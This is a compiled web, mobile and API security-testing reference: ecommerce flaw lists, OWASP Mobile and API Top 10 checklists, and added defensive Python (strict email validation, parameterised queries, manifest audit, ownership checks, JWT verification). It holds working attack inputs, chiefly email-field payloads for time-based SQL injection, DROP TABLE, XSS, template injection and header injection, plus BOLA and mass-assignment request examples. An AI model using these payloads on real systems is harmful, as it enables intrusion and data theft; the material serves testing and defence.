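Many HTTP libraries (Python's `http.client` included) already refuse header values containing CR or LF; the check above matters when a framework or hand-written server writes headers itself.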

Ecommerce bugs to test on

Order management flaws
1) Price manipulation during order placement
2) Shipping address manipulation after order placement
3) Absence of mobile verification for cash-on-delivery orders
4) Getting cash back/refunds even when the order is canceled
5) Non-deduction of discounts, even after order cancellation
6) Using automation techniques to perform illegitimate ticket blocking for a certain period of time
7) Client-side validation bypass for the maximum seat limit on a single order
8) Bookings/reservations using fake information
9) Usage of burner (disposable) phones for verification

32. Coupon and reward management flaws
1) Coupon redemption, even after order cancellation
2) Bypass of a coupon’s terms and conditions
3) Bypass of a coupon’s validity
4) Use of multiple coupons for the same transaction
5) Predictable coupon codes
6) Failure to recompute the coupon value after partial order cancellation
7) Illegitimate use of coupons with other products

33. Payment gateway integration flaws
1) Price modification at client-side with zero or negative values
2) Price modification at client-side with varying price values
3) Manipulating the contact URL
4) Bypassing the third-party checksum
5) Changing the price before the transaction is completed

34. Content management system flaws
1) Flaws in transaction file management
2) Unusual activities involving role-based access control (RBAC), which regulates access to computer or network resources
3) Flaws within the customer notification system
4) Misuse of rich-text editor functionalities (which edit text within web browsers)
5) Flaws in third-party application program interfaces (APIs), which are used to create specialized web stores
6) Flaws in integration with point-of-sale (POS) devices
Email validation payloads (Payload | Result | Injection status | Description)
{"email":"[email protected]"} | {"code":2002,"status":200,"message":"email vlaid."} | Valid
{"email":"[email protected]"} | {"code":2002,"status":200,"message":"bad formate."} | Not valid
{"email":"\"asd a\"@a.com"} | {"code":2002,"status":200,"message":"bad formate."} | Not valid
{"email":"asd(a)@a.com"} | {"code":2002,"status":200,"message":"bad formate."} | Not valid
{"email":"\"asd(a)\"@a.com"} | {"code":2002,"status":200,"message":"email vlaid."} | Valid

Email verification bypass leading to SQL injection
{"email":"asd'[email protected]"} | {"code":0,"status":500,"message":"Unspecified error"} | Not valid
{"email":"asd'or'1'='[email protected]"} | {"code":2002,"status":200,"message":"Email is valid"} | Valid
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='[email protected]"} | {"code":2002,"status":200,"message":"Bad formate"} | Not valid
{"email":"\"a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":2002,"status":200,"message":"Email Sucess"} | Valid | Delay: 7,854 ms
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":2002,"status":200,"message":"Email Sucess"} | Valid | Delay: 8,696 ms
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"} | {"code":2002,"status":200,"message":"Email Sucess"} | Valid | No delay
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com

Lead to cross-site scripting
"<script src=//xsshere?"@email.com
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com

Template injection
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com

SSRF injection
[email protected] (thanks @d0nutptr)
john.doe@[127.0.0.1]

Parameter pollution
victim&[email protected]

Email header injection
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com

Wildcard abuse
%@example.com

HTML injection in Gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com

Bypassing strict e-mail validators through SSO chains & integrations
<script>alert(0)</script>[email protected] | Google: No | GitHub: Yes | Twitter: No

Two different accounts registered using the same email
[email protected] | 1st account (real account)
[email protected] | 2nd account (fake account)
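A defensive counterpart to the tables above, added here as an example and not code from the original sheet: a strict email syntax gate that refuses the quoted local parts, bracketed IP literals and wildcard characters the payloads rely on, placed in front of a parameterised SQLite lookup that treats the address as data even when the gate is skipped. The regexes, the sample user table and the helper names are constructed for this demo.

```python
import re
import sqlite3

# Bare local part only: no quoted form ("..."), no ( ) ' " < > % & or CR/LF.
# Quoted local parts are RFC-legal, but they carried every payload the table
# above marks "Valid", so a login/registration field simply refuses them.
_LOCAL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9._+-]{0,62}[A-Za-z0-9])?$")
# Domain: dot-separated hostname labels and an alphabetic TLD, so the
# john.doe@[127.0.0.1] literal and example(<script>...).com are rejected too.
_DOMAIN_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def validate_email(addr) -> bool:
    """Strict syntax gate for an email field; True only for a plain user@host."""
    if not isinstance(addr, str) or len(addr) > 254:
        return False
    if addr.count("@") != 1:  # exactly one separator
        return False
    local, domain = addr.split("@")
    return bool(_LOCAL_RE.match(local) and _DOMAIN_RE.match(domain))


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory user table (sample rows, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, username TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice@example.com", "alice"), ("bob@example.com", "bob")],
    )
    return conn


def _find_by_email(conn, addr):
    # Bound parameter: the address is compared as a value, never spliced into
    # SQL, so IF(...SLEEP(7)...), ' OR 1=1 -- and LIKE wildcards match nothing.
    row = conn.execute(
        "SELECT username FROM users WHERE email = ?", (addr,)
    ).fetchone()
    return row[0] if row else None


def lookup_user(conn, addr):
    """Two layers: syntax gate first, then the parameterised lookup.

    Returns the username, None when unknown, and raises ValueError on bad
    syntax (the caller maps that to 'Not valid' without touching the DB).
    """
    if not validate_email(addr):
        raise ValueError("invalid email syntax")
    return _find_by_email(conn, addr)


def lookup_user_unvalidated(conn, addr):
    """The second layer alone: it holds even if a lenient validator let a
    quoted local part through."""
    return _find_by_email(conn, addr)


# Payloads copied from the table above, used as regression inputs for the gate.
PAGE_PAYLOADS = [
    '"asd(a)"@a.com',
    "asd'or'1'='1@a.com",
    '"a\'-IF(LENGTH(database())=9,SLEEP(7),0)or\'1\'=\'1"@a.com',
    "john.doe@[127.0.0.1]",
    "%@example.com",
    "test@example(<script>alert(0)</script>).com",
]

if __name__ == "__main__":
    conn = make_demo_db()
    for p in ["alice@example.com", *PAGE_PAYLOADS]:
        print(f"{p!r}: {'valid' if validate_email(p) else 'not valid'}")
    print(lookup_user(conn, "alice@example.com"))  # alice
    print(lookup_user_unvalidated(conn, "\"' OR 1=1 -- '\"@example.com"))  # None
```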
MobileApp_PT Checklist
Penetration testing checklist based on OWASP Top 10 Mobile 2016
(Columns: Test Name | Result)

M1. Improper Platform Usage
M1-01 Misuse of App permissions | Issue
M1-02 Insecure version of OS Installation Allowed | Issue
M1-03 Abusing Android Components through IPC intents ("exported" and "intent-filter") | Issue
M1-04 Misuse of Keychain, Touch ID and other security related controls | Issue
M1-05 Minimum Device Security Requirements absent | Issue
M1-06 Excessive port opened at Firewall | Issue
M1-07 Default credentials on Application Server | Issue
M1-08 Weak password policy Implementation | Issue
M1-09 Exposure of Webservices through WSDL document | Issue
M1-10 Security Misconfiguration on Server API | Issue
M1-11 Security Patching on Server API | Issue
M1-12 Input validation on API | Issue
M1-13 Information Exposure through API response message | Issue
M1-14 Control of interaction frequency on API (Replay Attack) | Issue

M2. Insecure Data Storage
M2-01 Unrestricted Backup file | Issue
M2-02 Unencrypted Database files | Issue
M2-03 Insecure Shared Storage | Issue
M2-04 Insecure Application Data Storage | Issue
M2-05 Information Disclosure through Logcat/Apple System Log (ASL) | Issue
M2-06 Application Backgrounding (Screenshot) | Issue
M2-07 Copy/Paste Buffer Caching | Issue
M2-08 Keyboard Press Caching | Issue

M3. Insecure Communication
M3-01 Insecure Transport Layer Protocols | Issue
M3-02 Use of Insecure and Deprecated algorithms | Issue
M3-03 Use of Disabling certificate validation | Issue
M3-04 SSL pinning Implementation | Issue
M3-05 End-to-end encryption | Issue

M4. Insecure Authentication
M4-01 Remember Credentials Functionality (Persistent authentication) | Issue
M4-02 Client Side Based Authentication Flaws | Issue
M4-03 Session invalidation on Backend | Issue
M4-04 Session Timeout Protection | Issue
M4-05 Cookie Rotation | Issue
M4-06 Multiple concurrent logins | Issue
M4-07 Exposing Device Specific Identifiers in Attacker Visible Elements | Issue

M5. Insufficient Cryptography
M5-01 Cryptographic Based Storage Strength | Issue
M5-02 Poor key management process | Issue
M5-03 Use of custom encryption protocols | Issue
M5-04 Token/Session Creation and handling | Issue

M6. Insecure Authorization
M6-01 Client Side Authorization Breaches | Issue
M6-02 Insecure Direct Object references | Issue
M6-03 Missing function level access control | Issue
M6-04 Bypassing business logic flaws | Issue

M7. Client Code Quality
M7-01 Content Providers: SQL Injection and Local File Inclusion | Issue
M7-02 Broadcast Receiver | Issue
M7-03 Service component | Issue
M7-04 Insufficient WebView hardening | Issue
M7-05 Injection (SQLite Injection, XML Injection) | Issue
M7-06 Local File Inclusion through NSFileManager or Webviews
M7-07 Abusing URL schemes or Deeplinks
M7-08 Sensitive Information Masking | Issue

M8. Code Tampering
M8-01 Unauthorized Code Modification | Issue
M8-02 Runtime Manipulation | Issue
M8-03 Rooted or Jail-broken device checking | Issue

M9. Reverse Engineering
M9-01 Reverse Engineering the Application Code (Code Obfuscating Checking) | Issue
M9-02 Information leakage/Hardcoded credential in the binaries | Issue

M10. Extraneous Functionality
M10-01 Debuggable Application | Issue
M10-02 Passwords/ Connection String disclosure | Issue
M10-03 Hidden and Unscrutinised functionalities | Issue
MobileApp_PT Checklist (detailed)
Penetration testing checklist based on OWASP Top 10 Mobile 2016
(Columns: Test Name | Description | Tool | Applicable Platform | OWASP | Result)

Static analysis
Reverse Engineering the Application Code (Code Obfuscating Checking) | Disassembling and decompiling the application | apktool, dex2jar, Clutch, Classdump | All | M9 | Issue
Information leakage/Hardcoded credential in the binaries | Identify sensitive information through binary/source code | strings, jdgui, IDA, Hopper | All | M9 | Issue
Unauthorized Code Modification | Static code modification, binary patching, bypass of the checksum mechanism | apktool, Hopper | All | M8 | Issue
Misuse of App permissions | Identify excessive app permissions | apktool, MobSF | Android | M1 | Issue
Insecure version of OS Installation Allowed | Identify "minSdkVersion" in apktool.yml; the value should be set over 17. For iOS, identify minOS using idb. | apktool, idb | All | M1 | Issue
Abusing Android Components through IPC intents ("exported" and "intent-filter") | Identify Android exported components | MobSF, AndroidManifest.xml | Android | M1 | Issue
Unrestricted Backup file | Check the "android:allowBackup" attribute, which should be set to "false" | apktool, AndroidManifest.xml | Android | M2 | Issue
Cryptographic Based Storage Strength | Identify insecure/deprecated cryptographic algorithms (RC4, MD5, SHA1) in the source code | jdgui, MobSF, Qark, Hopper, iFunbox | All | M5 | Issue
Poor key management process | Identify hardcoded keys in the application, or keys that may be intercepted via binary attacks | jdgui, MobSF, Qark, Hopper, iFunbox | All | M5 | Issue
Use of custom encryption protocols | Identify applications implementing their own protocol | jdgui, MobSF, Qark, Hopper, iFunbox | All | M5 | Issue
Debuggable Application | Identify the "android:debuggable" attribute | adb, MobSF | Android | M10 | Issue
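The manifest checks from the static-analysis rows above (android:debuggable, android:allowBackup, exported components, minSdkVersion), carried out by an added script that is not part of the original checklist. It reads AndroidManifest.xml directly rather than apktool.yml, the floor of 17 follows the row above, and the sample manifest is constructed for the demo.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def _a(elem, name):
    """Read an android:-namespaced attribute (None when absent)."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def audit_manifest(xml_text, min_sdk_floor=17):
    """Return (OWASP Mobile id, finding) pairs for the static checks above:
    debuggable flag, allowBackup, exported components, minSdkVersion.
    The launcher activity is listed too; it is expected to be exported, and
    the list is meant for review rather than as a verdict."""
    findings = []
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")
    raw_min = _a(sdk, "minSdkVersion") if sdk is not None else None
    min_sdk = int(raw_min) if raw_min else None
    app = root.find("application")
    if app is not None:
        if (_a(app, "debuggable") or "false").lower() == "true":
            findings.append(("M10", "android:debuggable is true"))
        backup = _a(app, "allowBackup")
        if backup is None or backup.lower() != "false":
            findings.append(("M2", f"android:allowBackup is {backup!r}, expected 'false'"))
        for comp in app:
            if comp.tag not in COMPONENT_TAGS:
                continue
            name = _a(comp, "name") or "<unnamed>"
            exported = (_a(comp, "exported") or "").lower()
            has_filter = comp.find("intent-filter") is not None
            if exported == "true":
                findings.append(("M1", f"{comp.tag} {name} is explicitly exported"))
            elif exported == "":
                # No android:exported: a component with an intent-filter is exported
                # by default, and a provider is exported by default when minSdkVersion <= 16.
                if has_filter:
                    findings.append(("M1", f"{comp.tag} {name} has an intent-filter and no android:exported (exported by default)"))
                elif comp.tag == "provider" and min_sdk is not None and min_sdk <= 16:
                    findings.append(("M1", f"provider {name} has no android:exported and minSdkVersion <= 16 (exported by default)"))
    if min_sdk is not None and min_sdk < min_sdk_floor:
        findings.append(("M1", f"minSdkVersion {min_sdk} is below {min_sdk_floor}"))
    return findings


# Constructed sample manifest (not from any real app) exercising each check.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demo">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="30"/>
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="true"/>
    <receiver android:name=".BootReceiver" android:exported="false"/>
    <provider android:name=".DataProvider" android:authorities="com.example.demo.data"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for owasp_id, text in audit_manifest(SAMPLE_MANIFEST):
        print(f"[{owasp_id}] {text}")
```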

Dynamic and runtime analysis
Misuse of Keychain, Touch ID and other security related controls | Identify misuse of the Data Protection API on Keychain and misuse of Touch ID (retrieve credentials from local storage, local authentication) | iDevice | iOS | M1 | Issue
Minimum Device Security Requirements absent | Ensure that the app cannot execute when the PIN or pattern lock is not enabled | Device | All | M1 | Issue
Unencrypted Database files | Check encryption on database files | adb, idb, iFunbox | All | M2 | Issue
Insecure Shared Storage | Identify sensitive data on shared storage, SD card storage encryption, shared preferences with MODE_WORLD_READABLE | adb | Android | M2 | Issue
Insecure Application Data Storage | Identify sensitive data in application files (application log, cache file, cookie) | adb, idb, iFunbox, BinaryCookieReader | All | M2 | Issue
Information Disclosure through Logcat/Apple System Log (ASL) | Identify sensitive information in the application log | adb logcat, idb, libimobiledevice | All | M2 | Issue
Application Backgrounding (Screenshot) | Identify the application snapshot/screenshot taken on backgrounding | Device, iFunbox | All | M2 | Issue
Copy/Paste Buffer Caching | Identify whether copy/paste is disabled for sensitive parts of the application (EditText/UITextField) | idb, iFunbox | All | M2 | Issue
Keyboard Press Caching | Identify the keyboard cache file located in /var/mobile/Library/Keyboard (iOS) or /data/data/com.android.providers.userdictionary/databases/user_dict.db (Android) | Device, idb, iFunbox | All | M2 | Issue
Unrestricted Backup file | For Android, check the "android:allowBackup" attribute, which should be set to "false". For iOS, use iTunes to back up the application folder in order to check for sensitive info in the backup folder | apktool, iPhone Backup Extractor | All | M2 | Issue
Remember Credentials Functionality (Persistent authentication) | Identify the user's password or sessions stored on the device | adb, idb, iFunbox | All | M4 | Issue
Client Side Based Authentication Flaws | Perform binary attacks against the mobile app in order to bypass offline authentication | adb, Drozer, Cycript, Snoop-it, Burpsuite | All | M4 | Issue
Client Side Authorization Breaches | Perform binary attacks against the mobile app and try to execute privileged functionality that should only be executable by a user of higher privilege | adb, Drozer, Cycript, Snoop-it, Burpsuite | All | M6 | Issue
Content Providers: SQL Injection and Local File Inclusion | Identify SQLi and LFI on content provider components | Drozer | Android | M7 | Issue
Broadcast Receiver | Identify intent-filters on broadcast receiver components in order to directly access and sniff the information | Drozer | Android | M7 | Issue
Service component | Invoke service components directly | Drozer | Android | M7 | Issue
Insufficient WebView hardening | Identify misconfiguration of "android.webkit.WebSettings" (JavaScript/file access/plugins), XSS through UIWebView | jdgui, iDevice | All | M7 | Issue
Injection (SQLite Injection, XML Injection) | Identify SQLi and XMLi in the application | adb, iDevice, Burpsuite | All | M7 | Issue
Local File Inclusion through Webviews | Check LFI in the application (../ , ../../blah\0); WebView file access attack through setAllowFileAccess | jdgui, iDevice | All | M7 | Issue
Abusing URL schemes or Deeplinks | For iOS: identify URL schemes through Info.plist and Clutch+strings to obtain URL scheme structures. For Android: identify URL schemes through the source code or the manifest file | apktool, jdgui, Clutch, strings | All | M7 | Issue
Sensitive Information Masking | Identify sensitive information masking (credit card number on the UI and in HTTPS traffic) | Device, Burpsuite | All | M7 | Issue
Runtime Manipulation | Run-time manipulation, method swizzling | Frida, Cycript, Snoop-it | All | M8 | Issue
Rooted or Jail-broken device checking | Detect root/jailbreak detection code in the reverse-engineered app file. If found, delete or change the access control of the file containing the code and restart the app, or install tools like hidemyroot and run the app | tsProtector, RootCloak2 | All | M8 | Issue
Passwords/Connection String disclosure | Identify sensitive information (credentials) between mobile and API | jdgui, Burpsuite | All | M10 | Issue
Hidden and Unscrutinised functionalities | Identify extraneous functionality (hidden back-end URLs) | jdgui, Burpsuite | All | M10 | Issue

Communication channel
Insecure Transport Layer Protocols | Observe the device's network traffic through a proxy to see whether SSL is implemented or not | Burpsuite | All | M3 | Issue
Use of Insecure and Deprecated algorithms | Identify SSL/TLS encryption algorithms | testssl.sh, Qualys SSL Labs | All | M3 | Issue
Use of Disabling certificate validation | Allows the tester to intercept SSL traffic without certificate installation (checkServerTrusted with an empty body) | jdgui, MobSF, Qark | All | M3 | Issue
SSL pinning Implementation | Check whether the application accepts a certificate from any trusted CA (Burpsuite) or not, e.g. check setAllowsAnyHTTPSCertificate (iOS) and AllowAllHostnameVerifier (Android) | jdgui, MobSF, Qark | All | M3 | Issue
End-to-end encryption | Identify end-to-end encryption at the application layer | Burpsuite | All | M3 | Issue

Server side - Webservices and API
Excessive port opened at Firewall | Identify open ports at the server-side URL/IP address | Nmap | All | M1 | Issue
Default credentials on Application Server | Identify default credentials on the backend server (e.g. Tomcat application server using tomcat/tomcat, admin/tomcat) | Web browser | All | M1 | Issue
Weak password policy Implementation | Identify weak password policy implementation on both the mobile and server side (e.g. bypass password complexity checking on the UI) | Burpsuite | All | M1 | Issue
Exposure of Webservices through WSDL document | Identify web service help pages (*.asmx) which show methods and structure | Web browser | All | M1 | Issue
Security Misconfiguration on Server API | Identify web server configuration (e.g. error handling, HTTP response banner) | Web browser, Burpsuite | All | M1 | Issue
Security Patching on Server API | Identify vulnerabilities on the server API | Nessus | All | M1 | Issue
Input validation on API | Check input validation (e.g. SQL injection, XXE) on the API/web services | Burpsuite | All | M1 | Issue
Information Exposure through API response message | Identify sensitive information in API response messages/headers | Burpsuite | All | M1 | Issue
Control of interaction frequency on API (Replay Attack) | Conduct simultaneous requests against the API (e.g. OTP, email sending) | Burpsuite (Intruder) | All | M1 | Issue
Session invalidation on Backend | Ensure that all session invalidation events are executed on the server side and not just in the mobile app | Burpsuite | All | M4 | Issue
Session Timeout Protection | The mobile app must have adequate timeout protection on the backend components | Burpsuite | All | M4 | Issue
Cookie Rotation | Ensure that cookie reset is properly implemented during authentication state changes (Anonymous<->User, User A<->User B, Timeout) | Burpsuite | All | M4 | Issue
Multiple concurrent logins | Simultaneously log in from multiple devices with the same credentials | Burpsuite | All | M4 | Issue
Exposing Device Specific Identifiers in Attacker Visible Elements | Observe the device's network traffic through a proxy to see whether device information (UDID) is sent during transmission or not | Burpsuite | All | M4 | Issue
Token/Session Creation and handling | Tokens should use a standard algorithm and be sufficiently long, complex, and pseudo-random so as to be resistant to guessing/anticipation attacks | Burpsuite | All | M5 | Issue
Insecure Direct Object references | Directly access unauthorised objects/variables through HTTPS traffic | Burpsuite | All | M6 | Issue
Missing function level access control | Directly access unauthorised functions through HTTPS traffic | Burpsuite | All | M6 | Issue
Bypassing business logic flaws | Bypass business logic data validation, circumvention of workflows | Burpsuite | All | M6 | Issue
OWASP API Security Top 10 (columns: S. No. | OWASP Top 10 API | Approach | HackerOne reports for reference)

1. A1 - BOLA (Broken Object Level Authorization)
Approach:
- User ID 718492 rating his ride: intercept the request and change the ID to 718493; in the database it is recorded as user 718493 rating his ride.
- Based on user ID and object ID:
  Profile controller - user #585 has access to update profile #616:
    POST /update_profile
    {"user_id":616, "email":"[email protected]"}
  Receipts controller - user #232 has access to view receipt #777:
    GET /receipts/777
  Admin panel controller - admin #616 has access to delete user #888:
    DELETE /admin/delete_user?user_id=888
Reference: Uber full account takeover by Anand Prakash (AppSecure)

2. A2 - Broken User Authentication
Approach:
- Detection areas: Forgetpassword, weblogin, get_location, update_picture
- Rate limiting
- Misconfiguration: JWT allows, tokens don't expire, etc.
- Extra protection: account lockout, captcha, brute-force attacks
Reference: Facebook full account takeover by Anand Prakash (reset password token was a 5-digit value, predictable)

3. A3 - Excessive Data Exposure
Approach:
- APIs expose sensitive data (PII) of other users by design
  GET /allusersinfo
  GET /match_users?from=0
Reference: 3fun app, by Alex Lomas (Pen Test Partners)

4. A4 - Lack of Resources & Rate Limiting
Approach:
- Might lead to DoS
- Limit the number of requests
- Rate limiting absent
Reference: https://hackerone.com/reports/170310

5. A5 - Broken Function Level Authorization (BFLA)
Approach:
- Roles: admin, riders, drivers
- Privilege escalation, horizontal and vertical (e.g. a rider is able to delete an admin ID)
- Easiest way to detect:
  1) Fetch a user's profile
     GET /app/users_view.aspx?user_id=1337
  2) Delete the user via the admin function
     POST app/admin_panel/users_mgmt.aspx
     action=delete&user_id=1337
Reference: @uzsunny reported that by creating two partner accounts sharing the same business email, it was possible to be granted "collaborator" access to any store without any merchant interaction in the Shopify application. The code did not properly check what type the existing account was.

6. A6 - Mass Assignment
Approach:
- Create user, traditional flow:
  1) Legitimate request:
     POST /api/users/new
     {"username":"Inon", "pass":"123456"}
  2) Malicious request:
     POST /api/users/new
     {"username":"Inon", "pass":"123456", "role":"admin"}
- Easier to exploit in APIs
- Always try with GET, POST, PUT & PATCH
- Use mass assignment to bypass other security controls
Reference: https://hackerone.com/reports/9942 (users could enable API access for free via mass assignment; found by James Kettle (PortSwigger) in the New Relic program)
  POST /accounts/<account_id>.json
  account[firstname]="evil"&account[allow_api_access]=true

7. A7 - Security Misconfiguration
Approach: hardcoded passwords, lack of CSRF/CORS protection, lack of security HTTP headers, unnecessarily exposed HTTP methods, weak encryption, etc.
Reference: https://hackerone.com/reports/426165

8. A8 - Injection
Approach: SQL, NoSQL, blind SQL, command injection, etc.
Reference: https://hackerone.com/reports/768195

9. A9 - Improper Asset Management
Approach:
- API endpoints with no documentation
  Legitimate endpoints: /v1/get_user/, /v2/update_location
  Non-legitimate: /v0/b2b_old/export_all_users
- Finding unknown API hosts: payment-api.acme.com, mobile-api.acme.com, qa-3-old.acme.com (non-legitimate)
Reference: https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm

10. A10 - Insufficient Logging & Monitoring
Approach: same as OWASP Web Top 10 2017
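A defensive counterpart to the A1, A5 and A6 rows above, added here as an example and not code from the page or from the cited reports: the request shapes the table lists (update_profile with a foreign user_id, a receipt fetch, the admin delete, and a role smuggled into user creation), handled with object-level ownership checks, a server-side role check and a writable-field allowlist. The in-memory stores, the Forbidden type and the display_name field are assumptions; the user and receipt numbers are the ones in the table.

```python
class Forbidden(Exception):
    """Raised where the API must answer 403 (or 404, to hide existence)."""


# Constructed in-memory data standing in for the ride-sharing store the table
# describes; user/receipt numbers are taken from the table above.
PROFILES = {
    585: {"username": "u585", "email": "u585@example.com", "role": "user"},
    616: {"username": "u616", "email": "u616@example.com", "role": "admin"},
    888: {"username": "u888", "email": "u888@example.com", "role": "user"},
}
RECEIPTS = {777: {"owner": 616, "amount": "12.40"}}

# Property-level allowlist: what a caller may set on their *own* profile.
# "user_id" and "role" are deliberately absent (mass-assignment guard).
PROFILE_WRITABLE = {"email", "display_name"}


def update_profile(session_user_id, body):
    """POST /update_profile. The target object is always the session user; a
    user_id in the body is redundant at best and an attempt on another profile
    at worst, so any mismatch is refused before anything is written."""
    if "user_id" in body and body["user_id"] != session_user_id:
        raise Forbidden("object-level check: not the caller's profile")
    ignored = sorted(k for k in body if k not in PROFILE_WRITABLE and k != "user_id")
    PROFILES[session_user_id].update(
        {k: v for k, v in body.items() if k in PROFILE_WRITABLE}
    )
    return {"updated": sorted(k for k in body if k in PROFILE_WRITABLE), "ignored": ignored}


def create_user(body, next_id):
    """POST /api/users/new: the role is assigned server-side and never read
    from the request, so {"role":"admin"} in the body is reported as ignored.
    (Password hashing is out of scope for this demo and not shown.)"""
    PROFILES[next_id] = {"username": body["username"], "email": None, "role": "user"}
    return {"id": next_id, "role": "user", "ignored": sorted(set(body) - {"username", "pass"})}


def get_receipt(session_user_id, receipt_id):
    """GET /receipts/<id>: ownership is checked on every object fetch, and a
    missing receipt and a foreign receipt get the same answer."""
    receipt = RECEIPTS.get(receipt_id)
    if receipt is None or receipt["owner"] != session_user_id:
        raise Forbidden("object-level check: receipt not owned by caller")
    return receipt


def delete_user(session_user_id, target_id):
    """DELETE /admin/delete_user: function-level check on the caller's role,
    re-read from the server-side store, not from anything the client sent."""
    if PROFILES.get(session_user_id, {}).get("role") != "admin":
        raise Forbidden("function-level check: admin only")
    return PROFILES.pop(target_id, None) is not None


if __name__ == "__main__":
    for fn, args in [(update_profile, (585, {"user_id": 616, "email": "x@example.com"})),
                     (get_receipt, (232, 777)),
                     (delete_user, (585, 888))]:
        try:
            fn(*args)
        except Forbidden as exc:
            print(f"{fn.__name__}{args}: refused ({exc})")
    print(create_user({"username": "Inon", "pass": "123456", "role": "admin"}, 1001))
```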
API Security Checklist (each line is a task to verify)

Authentication
- Don't use Basic Auth. Use standard authentication instead (e.g. JWT, OAuth).
- Don't reinvent the wheel in authentication, token generation, password storage. Use the standards.
- Use Max Retry and jail features in login.

JWT (JSON Web Token)
- Use a random complicated key (JWT secret) to make brute forcing the token very hard.
- Don't extract the algorithm from the header. Force the algorithm in the backend (HS256 or RS256).
- Make token expiration (TTL, RTTL) as short as possible.
- Don't store sensitive data in the JWT payload; it can be decoded easily.
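The JWT items above as an added example, not code from the checklist or its source repository: verification that pins HS256 in the backend instead of dispatching on the token header, checks expiry and a short TTL, and a peek function showing why the payload is no place for secrets. The secret, the claims and the 15-minute TTL limit are assumed values; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json
import time

PINNED_ALG = "HS256"  # decided by the backend, never by the token header
MAX_TTL = 15 * 60     # seconds; keep the TTL short (assumed policy value)


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint a token the way the server would (also used to build test inputs)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def peek_claims(token: str) -> dict:
    """Payload without any verification: anyone holding the token can do this,
    which is why sensitive data must not live in it."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def verify_jwt(token: str, secret: bytes, now=None) -> dict:
    """Verify the signature with the pinned algorithm, then expiry and TTL.
    Returns the claims, or raises ValueError with the reason."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    try:
        header = json.loads(_b64url_decode(h))
        signature = _b64url_decode(s)
    except ValueError as exc:  # covers binascii.Error and JSONDecodeError
        raise ValueError("undecodable header or signature") from exc
    # Compare the header alg to the pinned one; never dispatch on it. A header
    # of "none", or RS256 swapped for HS256, is refused before any crypto runs.
    if header.get("alg") != PINNED_ALG:
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(p))
    now = time.time() if now is None else now
    exp, iat = claims.get("exp"), claims.get("iat")
    if not isinstance(exp, (int, float)) or not isinstance(iat, (int, float)):
        raise ValueError("exp and iat are required")
    if exp <= now:
        raise ValueError("token expired")
    if exp - iat > MAX_TTL:
        raise ValueError("TTL longer than policy allows")
    return claims


if __name__ == "__main__":
    secret = b"constructed-demo-secret-use-a-long-random-one"
    tok = sign_hs256({"sub": "alice", "iat": 1000, "exp": 1600}, secret)
    print(verify_jwt(tok, secret, now=1200))  # {'sub': 'alice', 'iat': 1000, 'exp': 1600}
    forged = _b64url_encode(b'{"alg":"none","typ":"JWT"}') + "." + tok.split(".")[1] + "."
    try:
        verify_jwt(forged, secret, now=1200)
    except ValueError as exc:
        print("rejected:", exc)  # rejected: algorithm 'none' not allowed
```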
OAuth
- Always validate redirect_uri server-side to allow only whitelisted URLs.
- Always try to exchange for code and not tokens (don't allow response_type=token).
- Use the state parameter with a random hash to prevent CSRF on the OAuth authentication process.
- Define the default scope, and validate scope parameters for each application.

Access
- Limit requests (throttling) to avoid DDoS / brute-force attacks.
- Use HTTPS on the server side to avoid MITM (man-in-the-middle) attacks.
- Use the HSTS header with SSL to avoid SSL strip attacks.

Input
- Use the proper HTTP method according to the operation: GET (read), POST (create), PUT/PATCH (replace/update), and DELETE (to delete a record), and respond with 405 Method Not Allowed if the requested method isn't appropriate for the requested resource.
- Validate content-type on the request Accept header (content negotiation) to allow only your supported formats (e.g. application/xml, application/json, etc.) and respond with 406 Not Acceptable if not matched.
